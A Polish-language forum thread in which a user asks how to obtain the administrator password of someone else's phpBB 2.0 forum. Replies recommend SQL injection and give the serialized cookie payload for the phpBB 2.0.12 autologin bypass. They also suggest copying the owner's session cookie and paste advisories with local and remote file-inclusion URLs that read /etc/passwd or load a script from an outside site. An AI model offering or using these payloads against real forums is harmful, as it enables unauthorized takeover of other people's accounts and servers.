Hej. Czy możliwe jest pozyskanie hasła administratora jakiegoś Forum opartego na phpBB 2.0? Z góry dziękuję za pomoc.
Hej. Czy możliwe jest pozyskanie hasła administratora jakiegoś Forum opartego na phpBB 2.0? Z góry dziękuję za pomoc.
Na pewno ta... Jesli wygladasz tak jak na avatarze to nie powinnas miec z tym zadnych problemow :-)
Tak na serio - phpBB do tych bezpiecznych nie nalezy moim zdaniem i wole go unikac wlasnie ze wzgledow bezpieczenstwa. Co do pozyskania hasla - zamiast wydobywac haslo prosciej bedzie je zmienic na swoje albo dodac usera z prawami admina uzywajac jakiegos SQL Injection, itd... wazne jaka jest wersja forum i czy jest podatne na atak...
2.0. dokładniej ;p
<= 2.0.12 - bez problemu - stary bład
http://www.cc-team.org/index.php?name=bugtraq&show=570
http://www.haxite.org/index.php3?sit...ul_view&id=442
tu moze troszke jaśniej
nowsze - trzeba bugtraq czytać
Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )
Mam problem. W instrukcji napisano:http://www.haxite.org/index.php3?sit...ul_view&id=442
tu moze troszke jaśniej
Tylko, że po wciśnięciu tego Replay dostaję coś takiego:Naciskamy Replay i :
Cookie: phpbb2support_data=a%3A0%3A%7B%7D
Zastąp to a%3A0%3A%7B%7D tym
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs% 3A6%3A%22useri d%22%3Bs%3A1%3A%222%22%3B%7D
Jak widać nie ma tam tego, co mam zastąpić, a mianowicie: "phpbb2support_data=a%3A0%3A%7B%7D"
Pomocy!
PS: Używam Firefox'a.
Ostatnio edytowane przez Zuzia : 01-27-2007 - 13:07
jesliu masz wieksza znajmosc idz od goscia do domu na kawe i skopjuj poprostu ciasteczko
hihi skoro nie ma tego to najprawdopodobniej wersja jest nowsza niż 2.0.12 - wsumie to sie tym nie bawillem więc moze jest na sali ktoś kto sie bawił ta luką
Agencja reklamy kielce (mały kilkudniowy case pozycjonerski )
zle mnie zrozumiałas mi chodziło o jedzenie ciasteczek to tylko takie cos co zapisuje przeglondarka i jak sie goscoł logował na tym forum to wszystko idze do cisteczka (cookies)
bugtrack:
iphpBB 2.x Activity MOD Plus - File Inclusion Vulnerability
Opracował: Paweł Jabłoński Data: 3.06.2006, 10:52
phpBB-Amod (http://www.phpbb-amod.com/)
Podatność wersji: 2.x
Ryzyko: Bardzo wysokie
Wykorzystanie tego błędu umożliwia zdalne załączenie arbitralne lokalnych plików do zmiennej phpBB.phpvv_root_path w /language/lang_english/lang_activity.p hp. Lukę znaleźć możemy w admin_hacks_list.php (linia 12).
- Kod lang_activity.php -
12: include_once($phpbb_root_path .'language/lang_'.
$board_config['default_lang'] .'/lang_activity_char.'. $phpEx);
- Koniec kodu -
Jeśli zmienna "magic_quotes_gpc" jest wyłączona, atakujący może załączyć pliki wewnętrzne z wykorzystaniem zerowego końca znaku (0x00). Jeśli natomiast zmienna "allow_url_fopen" jest dostępna, atakujący może załączać zewnętrzne pliki z lang_activity.php.
PRZYKŁAD_
Powodzenie ataku wymaga włączonej zmiennej "register_globals".
http://[hostname]/[phpBB]/ language/lang_english/lang_activity .php?phpbb_root_path=/etc/passwd%00
(warunek: magic_quotes_gpc Off)
http://[hostname]/[phpBB]/langu age/lang_english/lang_activity.php? phpbb_root_path=http://twoja_strona .pl/skrypt.txt
(warunek: allow_url_fopen On)
KONTAKT_
e-mail: [email protected]
website: http://www.nukedx.com
Błąd wykrył: Mustafa Can Bjorn
phpBB 2.x admin_hacks - Local Inclusion Vulnerability
Opracował: Paweł Jabłoński Data: 3.06.2006, 11:12
phpBB (admin/admin_hacks_list.php)
Podatność wersji: 2.x
Ryzyko: Bardzo wysokie
Wykorzystanie tego błędu umożliwia zdalne załączenie arbitralne lokalnych plików do phpBB.board_config[default_language] i zmiennej "phpEx" zawartej w admin_hacks_list.php. Luka znajduje się w admin_hacks_list.php (linie 30-37).
- Kod admin_hacks_list.php-
30: if( !empty($setmodules) )
31: {
32: include($phpbb_root_path . 'language/lang_' .
$board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx);
33: $filename = basename(__FILE__);
34: $module['General']['Hacks_List'] = $filename;
35:
36: return;
37: }
- Koniec kodu -
PRZYKŁAD_
Powodzenie ataku wymaga włączonej zmiennej "register_globals".
http://[hostname ]/[phpBB]/admin/admin_hacks_list.ph p?setmodules= 1&board_config[default_lang]=english&phpEx=../../../../. ./../../../etc/passwd
KONTAKT_
e-mail: [email protected]
website: http://www.nukedx.com
Błąd wykrył: Mustafa Can Bjorn
przyda sie również www.securiteam.com